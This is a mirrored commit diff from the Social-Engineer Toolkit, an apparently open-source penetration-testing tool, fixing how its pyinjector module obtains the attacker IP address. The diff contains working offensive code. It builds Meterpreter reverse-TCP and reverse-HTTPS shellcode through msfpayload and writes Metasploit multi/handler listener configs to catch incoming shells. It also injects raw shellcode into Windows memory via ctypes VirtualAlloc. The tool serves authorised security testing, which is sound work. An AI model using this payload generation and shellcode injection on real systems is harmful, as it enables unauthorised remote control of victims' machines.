mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-03-17 15:27:00 +00:00
Fixed a few bugs causing pyinjector not to load ipaddr
This commit is contained in:
parent
77df976186
commit
f5f3bcbd18
4 changed files with 14 additions and 7 deletions
|
@ -383,6 +383,10 @@ try:
|
|||
if choice9 == "4":
|
||||
choice9 = "windows/meterpreter/reverse_tcp_allports"
|
||||
|
||||
if ipaddr == "":
|
||||
# grab ipaddr if not defined
|
||||
ipaddr = check_options("IPADDR=")
|
||||
|
||||
if choice1 == "shellcode/alphanum":
|
||||
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
|
||||
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/meterpreter.raw" % (path,choice9,choice2,portnum,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
@ -395,8 +399,7 @@ try:
|
|||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
os.remove("%s/meta_config_multipyinjector" % (setdir))
|
||||
while 1:
|
||||
|
||||
|
||||
|
||||
if choice1 == "shellcode/multipyinject":
|
||||
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
|
||||
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
|
||||
|
@ -414,7 +417,11 @@ try:
|
|||
choice9 = "windows/meterpreter/reverse_tcp_allports"
|
||||
if choice9 == "5":
|
||||
choice9 = "windows/shell/reverse_tcp"
|
||||
# break out of loop, no longer needed
|
||||
# check the ipaddr
|
||||
if ipaddr == "":
|
||||
# grab ipaddr if not defined
|
||||
ipaddr = check_options("IPADDR=")
|
||||
# break out if not needed
|
||||
if choice9 == "6": break
|
||||
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
|
||||
if shellcode_port == "": shellcode_port = "443"
|
||||
|
@ -422,9 +429,6 @@ try:
|
|||
# here we prep our meta config to listen on all the ports we want - free hugs all around
|
||||
filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port)
|
||||
if ipaddr == "":
|
||||
# grab ipaddr if not defined
|
||||
ipaddr = check_options("IPADDR=")
|
||||
if port_check == False:
|
||||
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding true\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (choice9, ipaddr, shellcode_port))
|
||||
filewrite.close()
|
||||
|
|
|
@ -22,6 +22,9 @@ import threading
|
|||
def injection(sc):
|
||||
sc = sc.decode("string_escape")
|
||||
sc = bytearray(sc)
|
||||
# Initial awesome code and credit found here:
|
||||
# http://www.debasish.in/2012_04_01_archive.html
|
||||
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
|
||||
|
|
BIN
src/payloads/set_payloads/pyinjector.binary
Executable file → Normal file
BIN
src/payloads/set_payloads/pyinjector.binary
Executable file → Normal file
Binary file not shown.
|
@ -21,7 +21,7 @@ sc = sc.decode("string_escape")
|
|||
# convert to bytearray
|
||||
sc = bytearray(sc)
|
||||
|
||||
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
|
||||
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual address space
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
|
||||
|
|
Loading…
Add table
Reference in a new issue